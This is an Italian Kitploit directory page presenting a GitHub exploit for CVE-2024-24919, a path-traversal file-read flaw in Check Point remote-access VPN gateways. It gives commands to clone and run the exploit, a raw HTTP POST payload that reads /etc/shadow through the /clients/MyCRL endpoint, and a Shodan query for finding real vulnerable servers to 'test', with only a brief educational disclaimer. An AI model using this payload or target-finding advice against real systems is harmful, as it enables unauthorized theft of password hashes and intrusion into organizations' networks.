Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-24919-Exploit — CVE-2024-24919 Exploit e PoC - LFI critico per VPN di accesso remoto o Accesso mobile. | Kitploit
Strumenti/GitHubGitHub/rug4lo/cve-2024-24919-exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingApprendimento e Formazione
GitHubrug4lo/cve-2024-24919-exploit

CVE-2024-24919-Exploit

CVE-2024-24919 Exploit e PoC - LFI critico per VPN di accesso remoto o Accesso mobile.

Vedi Repository
32 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-24919-Exploit

Panoramica

Questo repository contiene un exploit in Python per la CVE-2024-24919, una vulnerabilità che permette di leggere file sensibili dalla pagina vulnerabile.

Questo exploit controlla innanzitutto se il target è vulnerabile, quindi recupera il percorso specificato.

Gravità: Critica

Utilizzo

Prima clona il repository:

root@kitploit:~
git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit

Assegna i permessi ed esegui l'exploit con python3

root@kitploit:~
chmod +x exploit.py
python3 exploit.py

Quindi segui i passaggi e otterrai i dati del file specificato

Se hai difficoltà, assicurati che l'URL specificato sia quello principale

✓ https://google.com

✘ https://google.com/search?client=firefox

POC (Proof Of Concept)

Per prima cosa dobbiamo assicurarci che il sito web abbia Check Point Security Gateways con VPN di accesso remoto o software di accesso mobile abilitati.

In questo exploit puntiamo all'endpoint {ip}/clients/MyCRL.

Questo endpoint è vulnerabile se effettuiamo una richiesta POST, aggiungendo la stringa CSHELL/ e il percorso del file che vogliamo leggere utilizzando un Path Traversal.

La richiesta sarà simile a questa:

root@kitploit:~
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

Abbiamo ottenuto tutto questo analizzando il codice sorgente

Per maggiori informazioni sul processo, consulta questo post --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/

Test

Se vuoi testare questa vulnerabilità, puoi usare Shodan per trovare siti web vulnerabili, utilizzando questa query su Shodan

root@kitploit:~
Server: “Check Point SVN Foundation”

Riferimenti

https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919

Dichiarazione di non responsabilità

Questo script è solo a scopo educativo. Usalo in modo responsabile e solo su sistemi per cui hai il permesso di accedere.

Scarica lo strumento